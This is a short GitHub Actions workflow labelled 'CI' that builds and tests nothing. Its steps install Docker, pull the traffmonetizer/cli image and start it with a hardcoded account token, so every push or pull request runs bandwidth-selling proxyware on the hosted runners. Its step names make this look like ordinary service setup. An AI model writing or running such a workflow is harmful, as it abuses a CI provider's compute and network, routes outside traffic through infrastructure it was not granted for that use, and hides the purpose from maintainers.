name: CI

on:
  push:
    branches:
      - main
  pull_request:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
    - name: Preparing all services
      run: |
        sudo apt update
        sudo apt install docker.io
        sudo systemctl start docker
        sudo systemctl enable docker
        docker pull traffmonetizer/cli:latest
    
    - name: Traffmonetizer is active
      run: |
        docker run -i traffmonetizer/cli:latest start accept --token HOZG4B2KyylLV24KcEfJjf+4SNFL6ETNnBVoKyp7CZc=
